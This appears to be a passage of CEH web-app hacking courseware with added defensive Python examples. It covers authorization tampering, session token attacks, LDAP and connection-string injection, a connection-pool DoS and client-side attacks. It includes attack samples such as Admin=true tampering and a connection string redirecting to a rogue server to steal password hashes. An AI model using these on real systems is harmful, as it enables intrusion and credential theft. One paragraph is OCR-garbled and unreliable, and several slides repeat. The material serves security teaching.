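    """Append an HMAC-SHA256 tag over the encoded body: 'body.tag'."""
    body = base64.urlsafe_b64encode(payload.encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the payload if the tag matches, else None (edited, forged, truncated)."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):     # constant-time comparison
        return None
    try:
        return base64.urlsafe_b64decode(body.encode()).decode()
    except (ValueError, UnicodeDecodeError):
        return None


def rewrite_role(encoded_body: str, new_role: str) -> str:
    """Decode a 'uid=...;role=...' body, swap the role, re-encode it.

    Against the unsigned cookie this edit is accepted as-is; against the signed
    cookie the rewritten body no longer matches its tag and is rejected.
    """
    fields = dict(item.split("=", 1) for item in decode_cookie_insecure(encoded_body).split(";"))
    fields["role"] = new_role
    return encode_cookie_insecure(";".join(f"{k}={v}" for k, v in fields.items()))
```

An HMAC gives integrity, not secrecy: the payload remains readable, so credentials still do not belong in a cookie, and because a valid signed cookie can be replayed unchanged it should also carry an expiry and be tied to the server-side session.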
Web App Hacking Methodology

Authorization protects web applications by giving certain users the authority to access the applications and restricting other users from accessing them. Attackers, by means of authorization attacks, try to gain access to information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.
Authorization Attack

Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc.
Attackers first access the web application using a low-privileged account and then escalate privileges to access protected resources.

Authorization Attack

In an authorization attack, the attacker first finds the lowest privileged account, then logs in as an authentic user and slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. The sources used by attackers in order to perform authorization attacks include the uniform resource identifier, parameter tampering, POST data, HTTP headers, the query string, cookies, and hidden tags.

Parameter Tampering

Parameter tampering is an attack based on the manipulation of parameters that are exchanged between server and client in order to modify application data, such as the price and quantity of products, permissions and user credentials, etc.
This information is usually stored in cookies, URL query strings, or hidden form fields, and is used to increase application control and functionality.

Post Data

Post data is often comprised of authorization and session information, since in most applications the information that is provided by the client must be associated
with the session that provided it. An attacker exploiting vulnerabilities in the post data can easily manipulate the post data and the information in it.
HTTP Request Tampering

Query String Tampering
If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms.
http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
https://juggyshop.com/books/download/pdf
https://juggybank.com/login/home.jsp?admin=true
Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers
If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities.
GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:...) Gecko/... Firefox/...
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False
ItemID=201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.

HTTP Request Tampering

Attackers tamper with the HTTP request without using another user's ID. The attacker changes the request in transit, before the message is received by the intended receiver.
Query String Tampering

An attacker tampers with the query string when the web application uses query strings to pass messages between pages. If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms.

FIGURE: Query String Tampering

Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers

If the application uses the Referer header for making access control decisions,
attackers can modify it to access protected application functionalities.

GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:...) Gecko/... Firefox/...
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin=False

FIGURE: HTTP Headers

ItemID=201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.
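The Admin=False parameter and the Referer header in the capture above are both written by the client, so an access decision based on either can be rewritten by the client. This added example (not the courseware's code) contrasts a handler that trusts those two inputs with one that derives the caller's identity from the server-side session bound to the cookie and checks role and ownership there. The session and item tables are constructed; the host and path echo the figure.

```python
"""Authorization decided from server-side state, not from request parameters.

Added example, not from the courseware. The session table, item table and the
request shape are constructed; the host and paths echo the figure above.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional, Union
from urllib.parse import parse_qs, urlsplit

# Constructed server-side state: session cookie -> principal, item -> owner.
SESSIONS = {
    "sess-7f3a": {"user": "jason", "role": "user"},
    "sess-9c1e": {"user": "root", "role": "admin"},
}
ITEMS = {201: {"owner": "acme"}, 202: {"owner": "jason"}}


@dataclass
class Request:
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)


def _query(req_or_url: Union[Request, str], name: str) -> Optional[str]:
    """First value of a query-string parameter, from a Request or a bare URL."""
    url = req_or_url.url if isinstance(req_or_url, Request) else req_or_url
    return parse_qs(urlsplit(url).query).get(name, [None])[0]


def _item_id(req: Request) -> Optional[int]:
    raw = _query(req, "ItemID")
    return int(raw) if raw is not None and raw.isdigit() else None


def download_vulnerable(req: Request) -> int:
    """Trusts ?Admin=true and the Referer's Admin flag: both are client-controlled."""
    item_id = _item_id(req)
    if item_id not in ITEMS:
        return 404
    admin_in_query = (_query(req, "Admin") or "false").lower() == "true"
    referer = req.headers.get("Referer", "")
    admin_in_referer = (_query(referer, "Admin") or "false").lower() == "true"
    return 200 if admin_in_query or admin_in_referer else 403


def download_hardened(req: Request) -> int:
    """Identity comes from the session bound to the cookie; role and ownership
    are looked up server-side. Query string and Referer play no part."""
    session = SESSIONS.get(req.cookies.get("JSESSIONID", ""))
    if session is None:
        return 401
    item_id = _item_id(req)
    if item_id not in ITEMS:
        return 404
    if session["role"] == "admin" or ITEMS[item_id]["owner"] == session["user"]:
        return 200
    return 403


# Constructed request modelled on the figure's capture, with both client-side
# "admin" signals flipped to true by an ordinary user.
TAMPERED = Request(
    url="http://juggyboy:8180/Applications/Download?ItemID=201&Admin=true",
    headers={"Referer": "http://juggyboy:8180/Applications/Download?Admin=True"},
    cookies={"JSESSIONID": "sess-7f3a"},
)
```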
Authorization Attack: Cookie Parameter Tampering

In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism.
The attacker then traps cookies set by the web application, tampers with their parameters using tools such as OWASP Zed Attack Proxy, and replays them to the application.
https://www.owasp.org

Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web application in order to perform malicious attacks. In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism. The attacker then traps cookies set by the web application, tampers with their parameters using tools such as Paros Proxy, and replays them to the application.

Source: https://www.owasp.org
Web App Hacking Methodology: Attack Session Management Mechanism

The session management mechanism is the key security component in most web applications. Because it plays such a central role, it has become a prime target for malicious attacks against application session management. An attacker who breaks the application's session management can easily bypass even robust authentication controls and masquerade as another application user without knowing that user's credentials (user name, password). The attacker can even take the entire application under his or her control by compromising an administrative user in this way. The details of attacks on the session management mechanism are described on the following slides.
Session Management Attack

A session management attack is one of the methods used by attackers to compromise a network. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate a privileged application user. A session management attack involves two stages: session token generation and exploitation of session token handling.

In order to generate a valid session token, the attacker performs:
- Session token prediction
- Session token tampering

Once the attacker has generated a valid session token, the attacker tries to exploit the session token handling in the following ways:
- Session hijacking
- Session replay
- Man-in-the-middle attack
Attacking Session Token Generation Mechanism

Attackers steal valid session tokens and then predict the next session token from the valid tokens they have obtained.

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When the session token is just the hex-encoding of an ASCII string, here user=jason;app=admin;date=23/11/2010, the attacker can predict another session token simply by changing the date and use it for another transaction with the server.

Session Token Prediction

Attackers obtain valid session tokens by sniffing the traffic or by legitimately logging into the application, and analyze them for encoding (hex-encoding, Base64) or any other pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session token.
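The weak-encoding case above can be checked mechanically. The following is an added example (not part of the original courseware): it pulls the SessionToken value from the page's own example URL, tries the encodings the text names (percent/hex and Base64), flags a token that decodes to readable key=value state, and shows what an opaque replacement token looks like.

```python
import base64
import re
import secrets
import string
from urllib.parse import unquote, urlsplit

# URL and token from this page's weak-encoding example.
WEAK_TOKEN_URL = (
    "https://www.juggyboy.com/checkout?SessionToken="
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30"
)

# One "key=value" field: identifier-like key, non-empty value without '='.
FIELD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_ -]*=[^=]+")


def extract_raw_token(url, param="SessionToken"):
    """Return the still-encoded value of `param` from the query string.
    (parse_qs would percent-decode it and hide the encoding we want to see.)"""
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key == param:
            return value
    return None


def decode_candidates(token):
    """Yield plausible decodings: percent-decoded, raw hex, Base64 (std or URL-safe)."""
    yield "percent", unquote(token)
    if token and len(token) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", token):
        yield "hex", bytes.fromhex(token).decode("latin-1")
    std = token.replace("-", "+").replace("_", "/")
    try:
        raw = base64.b64decode(std + "=" * (-len(std) % 4), validate=True)
        yield "base64", raw.decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError
        pass


def looks_structured(text):
    """True if text is printable ASCII made of ';'-separated key=value fields."""
    if not text or any(ch not in string.printable for ch in text):
        return False
    fields = [f for f in text.split(";") if f]
    return bool(fields) and all(FIELD_RE.fullmatch(f) for f in fields)


def assess_token(token):
    """Return (is_weak, encoding, decoded, fields): weak means the token is only
    an encoding of readable state that a user could edit and re-encode."""
    for encoding, decoded in decode_candidates(token):
        if looks_structured(decoded):
            fields = dict(f.split("=", 1) for f in decoded.split(";") if f)
            return True, encoding, decoded, fields
    return False, None, None, {}


def generate_session_token(nbytes=32):
    """Opaque replacement: 256 bits from the OS CSPRNG, URL-safe Base64, no state inside."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    weak, enc, decoded, fields = assess_token(extract_raw_token(WEAK_TOKEN_URL))
    print(f"weak={weak} encoding={enc} decoded={decoded!r} fields={fields}")
    print("opaque replacement:", generate_session_token())
```

The "fields" dictionary is what a reviewer would report: each field (especially date) is a value a client can change, so the server must instead look the session up by an unpredictable identifier.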
Attacking Session Tokens Handling Mechanism: Session Token Sniffing

Attackers first sniff the network traffic for valid session tokens and then predict the next session token based on the sniffed session token. The attacker uses the predicted session ID to authenticate himself or herself to the target web application. Thus, sniffing a valid session token is an important step in session management attacks.

Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the secure flag is not set, attackers can replay the cookie to gain unauthorized access to the application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.

Wireshark

Source: http://www.wireshark.org

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
FIGURE: Wireshark Tool Screenshot (capture showing an HTTP GET request and the Set-Cookie header of the server's response)
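The replay risk described above follows directly from the cookie attributes, which is why a defender audits Set-Cookie headers in captured or proxied responses. The following is an added example (not from the original courseware): the response text, host and cookie names are constructed placeholders; the code reports session-like cookies issued without Secure, HttpOnly or SameSite and shows the hardened header.

```python
import re

# Constructed response, modelled on what a sniffer sees; the host, cookie names and
# values are placeholders, not values from the original page.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: sessid=a1b2c3d4e5; path=/; domain=webmail.example.test\r\n"
    "Set-Cookie: theme=dark; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

# Cookie names that usually carry a session token.
SESSION_NAME_HINT = re.compile(r"sess|sid|token|auth", re.I)
REQUIRED_FLAGS = ("secure", "httponly", "samesite")


def parse_set_cookie(header_value):
    """Split 'name=value; attr; attr=val' into a dict; attribute names are lowercased."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if attr:
            key, _, val = attr.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_response(raw_response):
    """One finding per Set-Cookie header: which of the protective flags are missing."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    findings = []
    for line in head.split("\r\n")[1:]:
        key, _, val = line.partition(":")
        if key.strip().lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(val.strip())
        findings.append({
            "name": cookie["name"],
            "session_like": bool(SESSION_NAME_HINT.search(cookie["name"])),
            "missing": [f for f in REQUIRED_FLAGS if f not in cookie["attrs"]],
        })
    return findings


def harden_set_cookie(header_value, samesite="Lax"):
    """Return the header with Secure, HttpOnly and SameSite added where absent."""
    attrs = parse_set_cookie(header_value)["attrs"]
    out = header_value.strip().rstrip(";")
    if "secure" not in attrs:
        out += "; Secure"
    if "httponly" not in attrs:
        out += "; HttpOnly"
    if "samesite" not in attrs:
        out += f"; SameSite={samesite}"
    return out


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        if finding["session_like"] and finding["missing"]:
            print(f"{finding['name']}: missing {', '.join(finding['missing'])}")
```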
Web App Hacking Methodology: Perform Injection Attacks

(Methodology overview: Footprint Web Infrastructure, Attack Web Servers, Analyze Web Applications, Attack Authentication Mechanism, Attack Authorization Schemes, Attack Session Management Mechanism, Perform Injection Attacks, Attack Data Connectivity, Attack Web App Client, Attack Web Services)

Injection attacks are very common in web applications. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, SQL injection, LDAP injection, and XPath injection. Among all these, the most frequently occurring is the SQL injection attack. Injection takes place when data supplied by the user is sent to an interpreter as part of a command or query. To launch an injection attack, the attacker supplies crafted data that tricks the interpreter into executing unintended commands or queries. Because of injection flaws, the attacker can easily read, create, update, and remove arbitrary data available to the application. In some cases, the attacker can even bypass a deeply nested firewall environment and take complete control over the application and the underlying system. The details of each injection attack are given on the following slides.
Injection Attacks

In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used, in order to break the application's normally intended input handling.

- Web Scripts Injection: If user input is used in code that is dynamically executed, the attacker enters crafted input that breaks the intended data context and executes commands on the server.
- OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command.
- SMTP Injection: Inject arbitrary SMTP commands into the application's conversation with the SMTP server to generate large volumes of spam email.
- SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
- LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters and obtain direct access to databases.
- XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection Attacks.
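For the LDAP injection item above, the following is an added example (not from the original courseware) of the vulnerable pattern beside its hardened form. It builds a login search filter two ways, escapes user-controlled values according to RFC 4515, and inspects the resulting filter text so the effect of crafted input can be seen without a directory server; the attribute names uid and userPassword are assumed for illustration.

```python
import re


def ldap_filter_escape(value):
    """Escape an assertion value for use inside an LDAP search filter (RFC 4515):
    the characters \\ * ( ) and NUL become a backslash plus two hex digits."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def naive_login_filter(username, password):
    """The vulnerable pattern: raw input pasted straight into the filter text."""
    return "(&(uid=%s)(userPassword=%s))" % (username, password)


def safe_login_filter(username, password):
    """The same filter with every user-controlled value escaped first."""
    return "(&(uid=%s)(userPassword=%s))" % (
        ldap_filter_escape(username), ldap_filter_escape(password))


# A simple equality assertion "(attr=value)" whose value holds no raw parentheses.
ASSERTION_RE = re.compile(r"\(([A-Za-z][A-Za-z0-9-]*)=([^()]*)\)")


def assertions(filter_text):
    """List the (attribute, value) assertions the directory server would evaluate."""
    return ASSERTION_RE.findall(filter_text)


def has_wildcard_match(filter_text, attribute="uid"):
    """True if the filter ends up testing `attribute` against the bare wildcard '*'."""
    return any(a == attribute and v == "*" for a, v in assertions(filter_text))


if __name__ == "__main__":
    # Constructed input that closes the uid assertion and opens new ones.
    crafted = "*)(uid=*))(|(uid=*"
    for label, build in (("naive", naive_login_filter), ("safe", safe_login_filter)):
        text = build(crafted, "x")
        print(label, text)
        print("  assertions:", assertions(text), "wildcard:", has_wildcard_match(text))
```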
Web App Hacking Methodology: Attack Data Connectivity

Attacking the data connectivity allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks, their causes, and their consequences are explained in detail on the following slides.
Attack Data Connectivity

Attackers directly attack data connectivity so that they can access sensitive information available in the database. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.

Data Connectivity Attacks
- Connection String Injection
- Connection String Parameter Pollution (CSPP) Attacks
- Connection Pool DoS

Database connection strings are used to connect applications to database engines. Example of a common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
Connection String Injection

A connection string injection attack can occur when dynamic string concatenation is used to build connection strings based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed using a "last one wins" algorithm, so the hostile input is substituted for the legitimate value.

The connection string builder classes are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs, and an invalid pair throws an exception. In addition, injected values are handled in a safe manner.

Before injection

The common connection string connects to the Microsoft SQL Server database as follows:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

FIGURE: Before injection

After injection

In a delegated authentication environment, attackers can inject parameters simply by appending them after a semicolon (;) character, using connection string injection techniques. In the following example, the user is asked for a user name and password that are used to create the connection string. Here the attacker enters the password as "pwd; Encryption=off", which means the attacker has switched off encryption. The resulting connection string becomes:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

FIGURE: After injection

When the connection string is populated, the Encryption value is added to the previously configured set of parameters.
Connection String Parameter Pollution (CSPP) Attacks

Connection string parameter pollution (CSPP) is used by attackers to steal user IDs and to hijack web credentials. CSPP specifically exploits the semicolon-delimited database connection strings that are constructed dynamically from user input to web applications. In CSPP attacks, attackers overwrite parameter values in the connection string.

Hash Stealing

An attacker replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server connected to the Internet and running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Rogue_Server; Password=; Integrated Security=true;

Attackers will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it is running under.

Port Scanning

The attacker tries to connect to different ports by changing the port value and observing the error messages obtained:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;

Hijacking Web Credentials

The attacker tries to connect to the database by using the web application's system account instead of a user-provided set of credentials:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target_Server,Target_Port; Password=; Integrated Security=true;
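Both the connection string injection and the CSPP slides rest on the same two facts: the string is split on semicolons, and a repeated key is resolved "last one wins". The following is an added example (not from the original courseware, and not the .NET builder classes themselves) that implements that parsing, shows the page's "pwd; Encryption=off" and Rogue_Server strings being interpreted, flags repeated keys, and builds the string the builder-class way so that user input can only ever be a value.

```python
KNOWN_KEYS = {"data source", "network library", "initial catalog",
              "user id", "password", "encryption", "integrated security"}


def iter_pairs(conn_str):
    """Yield (key, value) pairs in order. Keys are case-insensitive; a value
    wrapped in single or double quotes may contain ';', and a doubled quote
    character inside it stands for a literal quote."""
    pos, n = 0, len(conn_str)
    while pos < n:
        while pos < n and conn_str[pos] in " ;":
            pos += 1
        if pos >= n:
            break
        eq = conn_str.find("=", pos)
        if eq < 0:
            raise ValueError("malformed connection string")
        key = conn_str[pos:eq].strip().lower()
        pos = eq + 1
        while pos < n and conn_str[pos] == " ":
            pos += 1
        if pos < n and conn_str[pos] in "\"'":
            quote, pos, buf = conn_str[pos], pos + 1, []
            while True:
                end = conn_str.find(quote, pos)
                if end < 0:
                    raise ValueError("unterminated quoted value")
                buf.append(conn_str[pos:end])
                if conn_str[end:end + 2] == quote * 2:   # doubled quote
                    buf.append(quote)
                    pos = end + 2
                    continue
                pos = end + 1
                break
            value = "".join(buf)
        else:
            end = conn_str.find(";", pos)
            end = n if end < 0 else end
            value = conn_str[pos:end].strip()
            pos = end
        yield key, value


def parse_connection_string(conn_str):
    """dict() keeps the last value seen for a repeated key: "last one wins"."""
    return dict(iter_pairs(conn_str))


def polluted_keys(conn_str):
    """Keys occurring more than once: the signature of CSPP or an injected parameter."""
    seen = {}
    for key, _ in iter_pairs(conn_str):
        seen[key] = seen.get(key, 0) + 1
    return [k for k, c in seen.items() if c > 1]


def quote_value(value):
    """Quote a value that could otherwise be read as more than one parameter."""
    if value == "" or value != value.strip() or any(c in value for c in ";\"'"):
        return '"' + value.replace('"', '""') + '"'
    return value


def build_connection_string(**params):
    """Builder-style construction: only known keys, every value quoted as needed,
    so user input can change a value but never add or overwrite a parameter."""
    parts = []
    for key, value in params.items():
        name = key.replace("_", " ").lower()
        if name not in KNOWN_KEYS:
            raise KeyError("unknown connection string key: " + name)
        parts.append("%s=%s" % (name, quote_value(str(value))))
    return ";".join(parts) + ";"


def naive_build(user, password):
    """The concatenation pattern the slides warn about, kept only to show its effect."""
    return ("Data Source=Server,Port; Network Library=DBMSSOCN; "
            "Initial Catalog=DataBase; User ID=%s; Password=%s;" % (user, password))


if __name__ == "__main__":
    print(parse_connection_string(naive_build("Username", "pwd; Encryption=off")))
    safe = build_connection_string(data_source="Server,Port", user_id="Username",
                                   password="pwd; Encryption=off")
    print(safe, parse_connection_string(safe), polluted_keys(safe))
```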
Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Example: By default, in ASP.NET, the maximum allowed connections in the pool is 100 and the timeout is 30 seconds. Thus, an attacker can run 100 queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS, such that no one else would be able to use the database-related parts of the application.
Web App Hacking Methodology: Attack Web App Client

Attacks performed on a server-side application infect the client-side application when the client-side application interacts with the malicious server or processes malicious data. The attack on the client side occurs when the client establishes a connection with the server. If there is no connection between client and server, then there is no risk, because no malicious data is passed by the server to the client. Consider an example of a client-side attack in which an infected web page targets a specific browser weakness and exploits it successfully. As a result, the malicious server gains unauthorized control over the client system.
172 Attack Web App Client J A t t a c k e r s i n t e r a c t w i t h t h e s e r v e r - s i d e a p p l i c a t i o n s i n u n e x p e c t e d w a y s i n o r d e r t o p e r f o r m m a l i c i o u s a c t i o n s a g a i n s t t h e e n d u s e r s a n d a c c e s s u n a u t h o r i z e d d a t a Redirection Attacks Frame Injection Session Fixation ActiveX Attacks Cross-Site Scripting HTTP Header Injection Request Forgery Attack Privacy Attacks C o p y r ig h t b y EC-Council. A l l R ig h ts R e s e r v e d R e p r o d u c tio n i s S t r i c t l y P r o h ib ite d. A t t a c k W e b A p p C l i e n t A tta c k e rs in te ra c t w ith th e se rv e r-s id e a p p lic a tio n s in u n e x p e c te d w ays in o rd e r to p e rfo rm m a lic io u s a c tio n s a g a in st th e e nd users and access u n a u th o riz e d d a ta. A tta c k e rs use v a rio u s m e th o d s to p e rfo rm th e m a lic io u s a tta c k s. The fo llo w in g a re th e m a lic io u s a tta cks p e rfo rm e d by a tta c k e rs to c o m p ro m is e c lie n t-s id e w e b a p p lic a tio n s : C ross-site S c rip tin g R e d ire c tio n A tta c k s HTTP H e a d e r In je c tio n F ram e In je c tio n R equest F o rg e ry A tta c k s Session F ixa tio n P rivacy A tta c k s A ctive X A tta c k s M odule 13 Page 1894
Cross-Site Scripting

An attacker injects malicious scripts into the pages of a vulnerable website, typically through input that the site reflects or stores without encoding it. The browser cannot tell the injected script from the site's own, so it runs with the site's origin: it can read session cookies, issue requests as the victim, and even rewrite the HTML content of the page.

Redirection Attacks

Attackers craft links and code that resemble the site the user intends to visit. When the user follows the link, an open redirect on the legitimate site forwards the user to a malicious website, where the attacker can harvest the user's credentials and other sensitive information.

HTTP Header Injection

An attacker whose input ends up in an HTTP response header (for example the Location header of a redirect) inserts carriage-return/line-feed sequences to add headers of their own or to split the response into multiple responses. This attack can deface websites, poison caches, and trigger cross-site scripting.

Frame Injection

When a page builds frame or iframe elements from unvalidated input, an attacker can inject a frame that loads attacker-controlled content inside the trusted site's page. This affects any browser and any script that does not validate untrusted input; the vulnerability occurs in HTML pages that use frames, and it is made easier by browsers allowing frames to be created and modified by script.

Request Forgery Attack

In this attack, the attacker exploits the trust a website or web application places in the user's browser. The attack works by including a link, form, or script in an attacker-controlled page that sends a request to a site to which the user is authenticated; the browser attaches the user's session cookie automatically, so the server processes the request as if the user had made it.

Session Fixation

Session fixation helps an attacker hijack a valid user session. The attacker first obtains a session ID that the server will accept, tricks the user into accessing the genuine web server with that existing session ID value (for example through a link carrying the ID), and waits for the user to log in. Because the application does not issue a new session ID at login, the attacker, who already knows the ID, now holds an authenticated session.

Privacy Attacks

A privacy attack is tracking performed with the help of a remote site, based on persistent browser state (cookies, cache, history, or local storage) that leaks across sites.

ActiveX Attacks

The attacker lures the victim via email or a link to a page crafted so that a remote code execution flaw in an installed ActiveX control becomes reachable. Code run through the control executes with the privileges of the logged-in user, so the attacker gains access equal to that of an authorized user.
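The session fixation flow described above, as an added example that is not part of the CEH material. A tiny in-memory session store stands in for the web server: the vulnerable login keeps whatever session ID the browser presented, so an ID the attacker planted before login becomes an authenticated session the attacker already knows, while the hardened login issues a fresh random ID at login and discards the old one. The user name, password, and the attacker-chosen ID are constructed for the example.

```python
"""Session fixation, vulnerable login beside the hardened one (added example)."""
import secrets


class SessionStore:
    """Server-side session table: session_id -> {"user": name or None}."""

    def __init__(self):
        self.sessions = {}

    def get_or_create(self, presented_id):
        # Vulnerable pattern: accept any client-supplied ID, even one the
        # server never issued, and start tracking state under it.
        if presented_id not in self.sessions:
            self.sessions[presented_id] = {"user": None}
        return presented_id

    def new_session(self):
        sid = secrets.token_urlsafe(32)        # unguessable, server-generated
        self.sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")


CREDENTIALS = {"alice": "correct horse battery staple"}   # constructed account


def login_fixation_vulnerable(store, presented_id, username, password):
    """Authenticates into the session the browser already presented."""
    sid = store.get_or_create(presented_id)
    if CREDENTIALS.get(username) == password:
        store.sessions[sid]["user"] = username    # attacker's ID is now logged in
    return sid


def login_hardened(store, presented_id, username, password):
    """Rotates the session ID on successful login so a pre-set ID is useless."""
    if CREDENTIALS.get(username) != password:
        return store.get_or_create(presented_id)  # still anonymous, unchanged
    store.sessions.pop(presented_id, None)        # invalidate the pre-login ID
    sid = store.new_session()
    store.sessions[sid]["user"] = username
    return sid


def run_attack(login):
    """Returns which user the attacker can act as after the victim logs in."""
    store = SessionStore()
    attacker_sid = "ATTACKER-KNOWN-ID-0001"  # e.g. delivered in a ?SESSIONID= link
    store.get_or_create(attacker_sid)        # attacker primes the ID on the server
    login(store, attacker_sid, "alice", CREDENTIALS["alice"])  # victim logs in with it
    return store.user_for(attacker_sid)      # attacker replays the same ID


if __name__ == "__main__":
    print("vulnerable login:", run_attack(login_fixation_vulnerable))  # alice
    print("hardened login:  ", run_attack(login_hardened))             # None
```

The check a practitioner runs against a real application is the same as `run_attack`: set a cookie value of your own choosing before authenticating, log in, and see whether the server still honours that value afterwards. Rotating the ID at every privilege change (login, role switch) is the fix; rejecting IDs the server never issued closes the priming step as well.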
Web App Hacking Methodology: Attack Web Services

Methodology steps shown on the slide: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services (the current step).

Web services are easy targets for an attacker, and serious security breaches are caused when an attacker compromises them. The different types of web service attacks and their consequences are explained on the following slides.
Attack Web Services

Web services work atop the legacy web applications, so any attack on a web service immediately exposes the underlying application's business and logic vulnerabilities to various attacks.

Web services can be attacked using many techniques because they are made available to users through various mechanisms, which increases the number of possible vulnerabilities. The attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons behind attacking web services, and the attacker chooses the attack according to the purpose: if the intention is to stop a web service from serving its intended users, the attacker can launch a denial-of-service attack by sending numerous requests. The various types of attacks used against web services are:

- SOAP Injection
- XML Injection
- WSDL Probing Attacks
- Information Leakage
- Application Logic Attacks
- Database Attacks
- DoS Attacks

Figure: Attack Web Services (the attack categories listed above)
Web Services Probing Attacks

